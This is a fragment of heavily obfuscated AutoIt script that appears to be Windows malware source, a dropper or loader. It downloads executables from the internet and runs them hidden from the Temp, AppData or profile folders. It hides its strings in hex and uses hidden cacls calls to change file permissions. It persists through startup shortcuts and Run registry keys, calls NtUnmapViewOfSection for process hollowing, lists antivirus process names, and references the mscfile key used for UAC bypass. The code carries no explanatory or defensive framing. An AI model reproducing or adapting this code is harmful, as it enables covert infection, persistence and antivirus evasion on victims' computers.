1016. Return dqxfslpnbuemcrgxagplmoyd_dqqnegeeznsydhb()
1017. EndFunc
1018.  
1019. Func hygfsjgpza()
1020. Local $eq1oam0oalcj0tabomyqeuuyeg6njckk8qqc = "cmdagent.exe"
1021. Return $eq1oam0oalcj0tabomyqeuuyeg6njckk8qqc
1022. EndFunc
1023.  
1024. Func poieranvshdqmkipghxvzyhwefhrdfirexfdwqq()
1025. Return "X64"
1026. EndFunc
1027.  
1028. Func zvwndffxdbesncpkyrbjbyfasim()
1029. Return BinaryToString("0X64776f7264205669727475616c416464726573733b2064776f72642053697a654f66426c6f636b")
1030. EndFunc
1031.  
1032. Func bnsvysdmfcvpyfc()
1033. Return "-RSH"
1034. EndFunc
1035.  
1036. Func esmvok_rkimdmtlhorftuvvulz_dbkiprijvximo_qjpenkiso()
1037. Local $er2bmvw10kpeulype9ajxz1wzlvkmoufl8ipp = "Process"
1038. Return $er2bmvw10kpeulype9ajxz1wzlvkmoufl8ipp
1039. EndFunc
1040.  
1041. Func bnlpzkechhfyauotjnrrclakycijdkbjoa_()
1042. Return "\"
1043. EndFunc
1044.  
1045. Func kfoafpxexzbtbwt_zlxizha()
1046. Return yueedxubmdzahqhitosr()
1047. EndFunc
1048.  
1049. Func bictenbxhtjgwsjpjtlz()
1050. Local $w1meb3hpudl47atbybg9dsxyhomzgjoytzsfkb4xjdy7u
1051. $w1meb3hpudl47atbybg9dsxyhomzgjoytzsfkb4xjdy7u = ".lnk"
1052. Return $w1meb3hpudl47atbybg9dsxyhomzgjoytzsfkb4xjdy7u
1053. EndFunc
1054.  
1055. Func kfryfuuq_aeiqzqc($izu68qryj7kquezgagq0gj6uik9qaadld9rif9, $smiiua7v3wxvswsplbht3kxeey1p = True)
1056. If $smiiua7v3wxvswsplbht3kxeey1p = True Then
1057. RunWait(@ComSpec & " /c echo " & "y| cacl" & 's.exe "' & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & '" /E ' & "/C /P" & ' "' & @UserName & ":R" & '"', @SystemDir, @SW_HIDE)
1058. RunWait(@ComSpec & dyciwwrjojzbrsppftmchong_a() & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & BinaryToString("0x22202F45202F43202F502022", ((1 / (Dec("1", 0) - 0)) - 0)) & jpdaayhe_iogzmlxfn_(xsguetdejifnxhci_f()) & cjufzzbfcyuqponrezanouwiifqalgkrbijsp(), @SystemDir, @SW_HIDE)
1059. RunWait(@ComSpec & BinaryToString(fpwymajqzzqkowvzlqaajtd_akcwqyoephhdlxd(), 1) & "echo y| cac" & 'ls.exe "' & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & BinaryToString("0x22202F45202F43202F502022", 1) & jpdaayhe_iogzmlxfn_(BinaryToString(erulcciyswnkioxvurelundmsbcnrdrtiikgcwdw(), 1)) & BinaryToString("0x" & "3A52" & "22", 1), @SystemDir, @SW_HIDE)
1060. RunWait(@ComSpec & BinaryToString(kadeezfkdnhosrk()) & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & BinaryToString("0x22202F45202F43202F502022") & jpdaayhe_iogzmlxfn_("S-1" & "-5" & "-1" & "8") & rzwyukcynnwzcpeuvhaibwylv_dwcpeuz(), @SystemDir, @SW_HIDE)
1061. Else
1062. RunWait(@ComSpec & " /c" & " cac" & "ls" & ".e" & "x" & 'e "' & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & '" ' & "/" & "E " & necwdvikdmlps() & '"' & @UserName & ":" & 'F"', @SystemDir, @SW_HIDE)
1063. RunWait(@ComSpec & aepnqjn_qjuku() & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & ekvcpbkylj() & jpdaayhe_iogzmlxfn_(BinaryToString(jtwsvuynftmtffnqaf_yhukqcdwlzjbfochbvgbtyinf(), (0 - ((1 - (-1 + 3)) / (0 + 1))))) & BinaryToString("0" & "X3" & "A46" & "22"), @SystemDir, @SW_HIDE)
1064. RunWait(@ComSpec & BinaryToString(BinaryToString("0X3078323032663633323036333631363336633733326536353738363532303232"), Int(ChrW("49"))) & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & '" /E' & " /" & "C /" & "G " & '"' & jpdaayhe_iogzmlxfn_("S-" & BinaryToString(BinaryToString("0X3058333132443335", StringLen("d"))) & "-32-54" & "4") & ":" & "F" & '"', @SystemDir, @SW_HIDE)
1065. RunWait(@ComSpec & iycuavspyqdvlavjjr() & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & rpauaspgbfiugfmcqguoytjnnguyvsdmdvuazorvetjk() & jpdaayhe_iogzmlxfn_(cfeocbswufxzhmuxldpwzaoxhjtwwpeu()) & BinaryToString(nphhlxwrdduxeeoaanaqplxef()), @SystemDir, @SW_HIDE)
1066. EndIf
1067. EndFunc
1068.  
1069. Func ytfojlx_kruklwmhosdufnetruxxriwje()
1070. Local $zy7pkzark7onq3aft6nwpdma02wtu6kmmod = "word Magic;"
1071. Return $zy7pkzark7onq3aft6nwpdma02wtu6kmmod
1072. EndFunc
1073.  
1074. Func rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($wberil45yllmiey1iokfjbehvcygbcitleksw, $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa = "", $aplg8mxou4fzdatnetu7atcnnp = False, $sbmujomkrphhwpfmxk4z = True)
1075. Local $kbiqevjzu53pnfd6e208ei9sh, $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8
1076. If $aplg8mxou4fzdatnetu7atcnnp = False Then
1077. $kbiqevjzu53pnfd6e208ei9sh = InetRead($wberil45yllmiey1iokfjbehvcygbcitleksw, (1 * Int(ChrW(51))))
1078. If @error Then Return SetError((0 - ((-1 + 0) / (-1 + 0))), @error, False)
1079. For $fz3eclo13c4hpsztvduuwn10gcs = 1 To ((StringLen("1WRzz?aw9h7G4ivu") - (30 + 86)) / (Int(Chr("49")) * (-4 + -6)))
1080. If $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa <> "" Then
1081. $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = wgcf_gtdxrlslmygxwlyembab($kbiqevjzu53pnfd6e208ei9sh, kwunbssfrdmowoetvphkavhjsyiuxsapmapqcbbrxvqcsnb() & $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa)
1082. Else
1083. $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = wgcf_gtdxrlslmygxwlyembab($kbiqevjzu53pnfd6e208ei9sh)
1084. EndIf
1085. If NOT @error Then ExitLoop
1086. Next
1087. If @error OR $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = 0 Then Return SetError(((-2 + 0) / ((StringLen("2") / (1 / -1)) + (-4 / (-1 - 1)))), @error, False)
1088. Return SetError(@error, "", False)
1089. Else
1090. Local $n4c3hqn4eib0zrsardsumi3 = $aplg8mxou4fzdatnetu7atcnnp & ujthcdgsfonaohqptubzgrvvrjiwidzohg() & Random(((-1696 + (-434664 * 2)) / ((12 + 569) - (((-339 - 178) - 489) - -2371))), (-179 - (-51368366 / 5047)), (StringLen("N") + 0)) & BinaryToString("0x2E657865", 1)
1091. InetGet($wberil45yllmiey1iokfjbehvcygbcitleksw, $n4c3hqn4eib0zrsardsumi3, (2 + 1), 0)
1092. If @error Then Return SetError((((0 + (-1 / (0 + -1))) / ((0 + ((((1 - 2) / 1) + (-2 / -1)) - 2)) / 1)) - 0), @error, False)
1093. bokfzmjaxngdfest($n4c3hqn4eib0zrsardsumi3)
1094. If $sbmujomkrphhwpfmxk4z = True Then
1095. If $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa <> "" Then
1096. ShellExecute($n4c3hqn4eib0zrsardsumi3, $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa, "", "", @SW_HIDE)
1097. Else
1098. ShellExecute($n4c3hqn4eib0zrsardsumi3, "", "", "", @SW_HIDE)
1099. EndIf
1100. If @error Then Return SetError((0 + (-1 * (0 + 2))), @error, False)
1101. EndIf
1102. Return SetError(0, "", True)
1103. EndIf
1104. EndFunc
1105.  
1106. Func jkq_orgovsecuydujwgdz_bsqb()
1107. Local $lfzazhuqjrgxw1s5evoeynr0nnszc31bqc32ipchkhzmlhkv
1108. $lfzazhuqjrgxw1s5evoeynr0nnszc31bqc32ipchkhzmlhkv = BinaryToString("0X" & "5c", 1)
1109. Return $lfzazhuqjrgxw1s5evoeynr0nnszc31bqc32ipchkhzmlhkv
1110. EndFunc
1111.  
1112. Func kyiemgvkglcbwefrbffhahvbkmbstpdibcseshweafd()
1113. Local $ssh4vamgd2bhdwsf4bu9pkohb4b5k8gdw1imailveenbek1wx
1114. $ssh4vamgd2bhdwsf4bu9pkohb4b5k8gdw1imailveenbek1wx = "msmpeng.exe"
1115. Return $ssh4vamgd2bhdwsf4bu9pkohb4b5k8gdw1imailveenbek1wx
1116. EndFunc
1117.  
1118. Func kr_drkpz_bhvyf()
1119. Local $t8fwyvai9m6nr6f7mvsuhtqq = "ProfileImagePath"
1120. Return $t8fwyvai9m6nr6f7mvsuhtqq
1121. EndFunc
1122.  
1123. Func mefxpfswzswtjltataaxpbri()
1124. Return " /TR "
1125. EndFunc
1126.  
1127. Func hidxeulzzhaepspsnqdmgj()
1128. Local $yfcex1vl3wc4z1wxt7vnuke = BinaryToString(azafjpmzmwynzucxglehiqbvspktez(), 1)
1129. Return $yfcex1vl3wc4z1wxt7vnuke
1130. EndFunc
1131.  
1132. Func eesacdgfyhvfvfyofjvhn_aqdptkinsnfnavyfgmowe()
1133. Return "6F73742E657"
1134. EndFunc
1135.  
1136. Func foiswliiodpbwmwok()
1137. Local $fhwfpfrahsjulbl73ek2tf5r46tki0
1138. $fhwfpfrahsjulbl73ek2tf5r46tki0 = "IA64"
1139. Return $fhwfpfrahsjulbl73ek2tf5r46tki0
1140. EndFunc
1141.  
1142. Func yueedxubmdzahqhitosr()
1143. Return '"'
1144. EndFunc
1145.  
1146. Func smtocknhnytfzkdktgmccdh()
1147. Local $aamwpgnz43iulwu7ib0dvof94uoy = "Magic"
1148. Return $aamwpgnz43iulwu7ib0dvof94uoy
1149. EndFunc
1150.  
1151. Func whmkkomlugeszcuofazuyripy_lpqlnzornvjlm()
1152. Local $pc13blgilhbzek3 = BinaryToString("0X3437396437363666343232663631")
1153. Return $pc13blgilhbzek3
1154. EndFunc
1155.  
1156. Func ttoltiicmgfiojuqigpzcqvdskcnrs($mpodnfy6il, $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku)
1157. DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $mpodnfy6il, "ptr", $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku)
1158. If @error Then Return SetError(1, 0, 0)
1159. Return Dec("1", 0)
1160. EndFunc
1161.  
1162. Func stvqetqqbhmugrymqjlizak_yukxjp_jxbsdbc($n4c3hqn4eib0zrsardsumi3, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
1163. If IsAdmin() Then
1164. If NOT FileExists(@StartupCommonDir & vk_efwdqyrquoke() & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & BinaryToString("0X2E6C6E6B", 1)) Then FileCreateShortcut($n4c3hqn4eib0zrsardsumi3, @StartupCommonDir & BinaryToString("0x5c") & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & BinaryToString("0x2" & "e6c6" & "e" & "6b", Dec("1", 0)), "", "", $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8, @SystemDir & majopsiftujeynku(), "", Random(StringLen("Y"), (27 * Dec("2"))), @SW_SHOWMINNOACTIVE)
1165. Else
1166. If NOT FileExists(@StartupDir & tjsutkilvvikvlhprwl() & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & ezysl_kfjvhamboowzltqujiznkwtexb()) Then FileCreateShortcut($n4c3hqn4eib0zrsardsumi3, @StartupDir & BinaryToString("0" & "X5" & "C", (-1 - ((-1 + 2) * ((StringLen("iY") * 2) / -2)))) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & ".l" & "n" & "k", "", "", $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8, @SystemDir & "\Shell" & "3" & "2.dl" & "l", "", Random(1, (-1566 / ((-4 * -58) / -8))), @SW_SHOWMINNOACTIVE)
1167. EndIf
1168. EndFunc
1169.  
1170. Func ebgjknluafaxae(ByRef $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai, $ffip5nhwpsdabovng)
1171. Local $4ldkhdkpxc8y6acgkqtovpbvla3shuz4nshpaymwjym = $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][0]
1172. Switch $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][Dec("1")]
1173. Case ((StringLen("N") / 1) + Dec("4"))
1174. rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((0 + -1) - (((-1 + -2) - 0) / 1))], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((1 * (4 / ((1 - 0) + -3))) + ((Dec("1", 0) * ((-2 + -1) - 0)) + Int(Chr(56))))], @TempDir)
1175. If @error Then Return SetError(@error, @extended, False)
1176. Case ((-2 * StringLen("pV")) / (Dec("1", 0) + ((-1 - 0) - Int(Chr("49")))))
1177. If $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][Dec("4", 0)] = 0 Then
1178. rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((1 + -2) - ((-9 / StringLen("?Z2")) - 0))], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][Dec("3", 0)])
1179. ElseIf $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][(-1 - (-20 / 4))] = 1 Then
1180. rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][StringLen("ef")], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][3], @ScriptDir)
1181. ElseIf $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][(((2 * -7) - -30) / (-12 / -3))] = 2 Then
1182. rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((-1 - -5) / 2)], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][3], @TempDir)
1183. ElseIf $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][StringLen("tKH5")] = 3 Then
1184. rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][2], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((-1 + -1) + ((14 + -39) / -5))], @AppDataDir)
1185. ElseIf $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((-12 + (-8 * -3)) / Dec("3"))] = (-4 - ((3 + (-1 * 7)) * Int(ChrW("50")))) Then
1186. rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][2], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][StringLen("A!t")], @UserProfileDir)
1187. EndIf
1188. If @error Then Return SetError(@error, @extended, False)
1189. Case ((1 - 0) * Int(ChrW("51")))
1190. wdeersmqmeia($rsfy8xu2owgjzzpao1)
1191. rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((((-1 + 0) / -1) - 5) / -2)], "", @TempDir)
1192. If @error Then Return SetError(@error, @extended, False)
1193. Exit
1194. Case (Int(Chr("50")) - 0)
1195. Exit
1196. Case 1
1197. wdeersmqmeia($rsfy8xu2owgjzzpao1)
1198. Exit
1199. EndSwitch
1200. Return SetError(0, "", True)
1201. EndFunc
1202.  
1203. Func bhdbndvdmngzjiwrafcrnttuviznobqoluwjkgnigeils()
1204. Local $rojfawysjwguajcmip01trks = BinaryToString(qvzvehgxhkjzwauiesstlqmfoohtexqnfxrzaudeciyqvnkiwf(), 1)
1205. Return $rojfawysjwguajcmip01trks
1206. EndFunc
1207.  
1208. Func vxmdryesvdsvpmndwbrmgperdotapac()
1209. Local $uktyug89zh88korerx = "bdss.exe"
1210. Return $uktyug89zh88korerx
1211. EndFunc
1212.  
1213. Func hsuakvazknwxbunnsnqlrovmtwlwqflka()
1214. Return "word["
1215. EndFunc
1216.  
1217. Func joudnyrrydhvjpqr_qbpophdiyevazz_yvvdzrjtzr()
1218. Return BinaryToString("0X53697a65")
1219. EndFunc
1220.  
1221. Func ktlqhfvxfwwmyfcvkonutgvlgpzijyjjvkk()
1222. Return BinaryToString("0x5c", 1)
1223. EndFunc
1224.  
1225. Func riglxmjnhpwm()
1226. Return BinaryToString(vyniphfzozthprpzbfrh(), 1)
1227. EndFunc
1228.  
1229. Func szr_hfbbpvvgvj()
1230. Return "%"
1231. EndFunc
1232.  
1233. Func iycuavspyqdvlavjjr()
1234. Local $lzeyehyrnqq5liyx1hx9z7gzaf
1235. $lzeyehyrnqq5liyx1hx9z7gzaf = " /c" & " cacl" & "s" & "." & 'exe "'
1236. Return $lzeyehyrnqq5liyx1hx9z7gzaf
1237. EndFunc
1238.  
1239. Func erulcciyswnkioxvurelundmsbcnrdrtiikgcwdw()
1240. Return "0x532d312d352d33322d353434"
1241. EndFunc
1242.  
1243. Func fqvyfwcsqpxyfdtcwtjwoztevhzv()
1244. Return "word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;uint64 ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;uint64 SizeOfStackReserve;uint64 SizeOfStackCommit;uint64 SizeOfHeapReserve;uint64 SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes"
1245. EndFunc
1246.  
1247. Func _lozqicnyrbvrlrvmyjguexpic()
1248. Return "ekrn.exe"
1249. EndFunc
1250.  
1251. Func njfxffbauedkqqqwhmruht($h5t48vabyzkd2herlmqm5vkhsucjhfgjkc, $et6npgi8gxqaewdpftbhl = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890")
1252. Local $4gkzstnhi3gu, $fz3eclo13c4hpsztvduuwn10gcs
1253. For $fz3eclo13c4hpsztvduuwn10gcs = ((Dec("1", 0) / -1) - (0 - ((Dec("1") * 2) + 0))) To $h5t48vabyzkd2herlmqm5vkhsucjhfgjkc
1254. $4gkzstnhi3gu &= StringMid($et6npgi8gxqaewdpftbhl, Random(Dec("1", 0), Dec("3e", 0), 1), 1)
1255. Next
1256. Return $4gkzstnhi3gu
1257. EndFunc
1258.  
1259. Func y_evhbxtkfwgubtphrqhnlpkscrshhpuotpajmno()
1260. Local $r9arpkpfbdymgd
1261. $r9arpkpfbdymgd = "]"
1262. Return $r9arpkpfbdymgd
1263. EndFunc
1264.  
1265. Func ylpsnxwwmqxf()
1266. Return qncfzvydwgstqxunvotpueu_rxayyoqh_tdytykgytbidaxl()
1267. EndFunc
1268.  
1269. Func nucbldtpuxmuekkoagchsndjpmwwupsxilqvhsp_dwpoeuhpmb()
1270. Return "HKEY_CURRENT_USER\Software\Classes\mscfile"
1271. EndFunc
1272.  
1273. Func cbxstjeryqrhpoxgtbhxk_wzvgxzxr()
1274. Local $op9gm5ksfg08r9v4ktpp9ljiswoo6z
1275. $op9gm5ksfg08r9v4ktpp9ljiswoo6z = khafkkhqtszrrefksmbbhsfidtcporlvzkfqmagvxj()
1276. Return $op9gm5ksfg08r9v4ktpp9ljiswoo6z
1277. EndFunc
1278.  
1279. Func etucwzrejgsaohyyngwcqpwbexyypvwcdvosoker()
1280. Local $dm12by9xghmuc
1281. $dm12by9xghmuc = BinaryToString("0x5c", 1)
1282. Return $dm12by9xghmuc
1283. EndFunc
1284.  
1285. Func nphhlxwrdduxeeoaanaqplxef()
1286. Local $gcywbq1xs9facifalnu = BinaryToString("0X3078334134363232", 1)
1287. Return $gcywbq1xs9facifalnu
1288. EndFunc
1289.  
1290. Func cfeocbswufxzhmuxldpwzaoxhjtwwpeu()
1291. Local $5zu8jv8ecomepw52u9eb3zkvwyxzddpmzovnqkyruwk4r
1292. $5zu8jv8ecomepw52u9eb3zkvwyxzddpmzovnqkyruwk4r = BinaryToString("0x532D312D352D3138", 1)
1293. Return $5zu8jv8ecomepw52u9eb3zkvwyxzddpmzovnqkyruwk4r
1294. EndFunc
1295.  
1296. Func maypwe_uyzihndz()
1297. DllCall("kernel32.dll", "int", "ReleaseMutex", "long", $zlbr6bdl1mpx5nytfs1owp086kb3oqnutrgd)
1298. DllCall("kernel32.dll", "int", "CloseHandle", "long", $zlbr6bdl1mpx5nytfs1owp086kb3oqnutrgd)
1299. Exit
1300. EndFunc
1301.  
1302. Func mxhcfimpbgdflxo($n4c3hqn4eib0zrsardsumi3, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
1303. Local $diactrta9rzcmrltyrimha9qn9nhk, $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm
1304. If @OSArch <> "X8" & "6" Then $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm = BinaryToString("0X3" & "634", (0 - (1 + -2)))
1305. If IsAdmin() Then
1306. $diactrta9rzcmrltyrimha9qn9nhk = enrmlznxprgqt() & $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm & "\Software\Microsoft\Win" & "dows\Cu" & "rr" & "ent" & "V" & "ers" & "ion" & "\R" & "un\"
1307. If RegRead($diactrta9rzcmrltyrimha9qn9nhk, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) <> $n4c3hqn4eib0zrsardsumi3 Then
1308. RegWrite($diactrta9rzcmrltyrimha9qn9nhk, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8, BinaryToString("0x5245475f535a"), $n4c3hqn4eib0zrsardsumi3)
1309. EndIf
1310. EndIf
1311. $diactrta9rzcmrltyrimha9qn9nhk = BinaryToString(ywcwajsbmizhdgeehnnudrkkjy(), (((-1 + 0) / StringLen("k")) / (-1 - 0)))
1312. If RegRead($diactrta9rzcmrltyrimha9qn9nhk, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) <> $n4c3hqn4eib0zrsardsumi3 Then
1313. RegWrite($diactrta9rzcmrltyrimha9qn9nhk, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8, BinaryToString(BinaryToString("0x3078353234353437356635333561"), Dec("1", 0)), $n4c3hqn4eib0zrsardsumi3)
1314. EndIf
1315. EndFunc
1316.  
1317. Func zvfemlxfgjseznsojvjozicrnghtsvsrmjvhylylukereztt()
1318. Return "0x61766763632E657865"
1319. EndFunc
1320.  
1321. Func fxsnghepq_i()
1322. Return "b" & "yt" & "e" & "["
1323. EndFunc
1324.  
1325. Func mtfbsxdops()
1326. Local $vip1ebb1qvkest7 = DllCall("connect.dll", "long", "IsInternetConnected")
1327. If @error Then
1328. Return SetError(Dec("1", 0), 0, False)
1329. EndIf
1330. Return $vip1ebb1qvkest7[0] = 0
1331. EndFunc
1332.  
1333. Func pcwvdlesitqrcmdjor()
1334. Local $i1ipqgsc4wkcmiouzfynkjgk12kzw3pcbhrfrpyvqzhk = "0x202F63206563686F20797C206361636C732E6578652022"
1335. Return $i1ipqgsc4wkcmiouzfynkjgk12kzw3pcbhrfrpyvqzhk
1336. EndFunc
1337.  
1338. Func _bmqdbh_ufvrqlauvcklcelaoiklndngwhaegqkha($cbkz2vkdak, $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa, $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = 1)
1339. Local $spalxneztc4vkfnp, $qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o, $zth2v7z43vsjsy3phfdag7itc98qzbn4humyh
1340. If NOT IsArray($cbkz2vkdak) Then Return False
1341. If $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = (1 + Dec("1")) Then
1342. $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa = StringSplit($cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa, BinaryToString(BinaryToString("0X30783743", 1), StringLen("G")))
1343. If @error Then Return False
1344. $spalxneztc4vkfnp = $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa[(1 + 0)] & ingfcooqsfxecrya() & wosiyabviqgshcpdjsloinxncqrohwqkgqopism($fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9) & aansg_xxrufwsrqikjgpwhsrjlejs() & $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa[StringLen("Ky")] & BinaryToString(rdptebhehksbnzvuts_aeodaoryyyztuzrcmjlkhlddlycey()) & wosiyabviqgshcpdjsloinxncqrohwqkgqopism($cbkz2vkdak[1]) & BinaryToString(BinaryToString(BinaryToString("0X30783330353833323336"), ((1 - Int(ChrW("50"))) + ((-2 / (1 / (-1 / Int(ChrW("49"))))) / ((1 + (0 + (1 * -2))) - (-2 / (Dec("1", 0) / 1))))))) & $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa[((1 + (-1 * Dec("2"))) + Dec("4", 0))] & vfxwvy_gs_mjgnvkxdz_mxpxbesnsvy() & wosiyabviqgshcpdjsloinxncqrohwqkgqopism($cbkz2vkdak[StringLen("ID")])
1345. Return $spalxneztc4vkfnp
1346. EndIf
1347. $cbkz2vkdak[0] = $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9
1348. $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa = StringSplit($cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa, lwkbknwltfwrl())
1349. If @error Then Return False
1350. For $qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o = 0 To UBound($cbkz2vkdak) - (((0 + -1) - 0) / -1)
1351. $cbkz2vkdak[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o] = $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o + ((1 - 2) / -1)] & fnhghgdwwyegz_uffrjftibmfxyhmifvsxmonefwem() & wosiyabviqgshcpdjsloinxncqrohwqkgqopism($cbkz2vkdak[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o])
1352. Next
1353. For $qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o = 0 To UBound($cbkz2vkdak) - (0 - (StringLen("?") / ((1 + 0) + (-2 / (0 + StringLen("x"))))))
1354. $zth2v7z43vsjsy3phfdag7itc98qzbn4humyh = Random(0, (UBound($cbkz2vkdak) - (Dec("1") - 0)), ((-1 / ((1 - 0) - 0)) / -1))
1355. $spalxneztc4vkfnp = $cbkz2vkdak[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o]
1356. $cbkz2vkdak[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o] = $cbkz2vkdak[$zth2v7z43vsjsy3phfdag7itc98qzbn4humyh]
1357. $cbkz2vkdak[$zth2v7z43vsjsy3phfdag7itc98qzbn4humyh] = $spalxneztc4vkfnp
1358. Next
1359. $spalxneztc4vkfnp = ""
1360. For $fz3eclo13c4hpsztvduuwn10gcs = 0 To UBound($cbkz2vkdak) - ((1 / ((-1 - 0) + 0)) + Dec("2"))
1361. $spalxneztc4vkfnp &= $cbkz2vkdak[$fz3eclo13c4hpsztvduuwn10gcs] & "&"
1362. Next
1363. Return StringLeft($spalxneztc4vkfnp, StringLen($spalxneztc4vkfnp) - (0 + (0 + ((-1 / Int(Chr("49"))) / -1))))
1364. EndFunc
1365.  
1366. Func ywcwajsbmizhdgeehnnudrkkjy()
1367. Return "0x484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e5c"
1368. EndFunc
1369.  
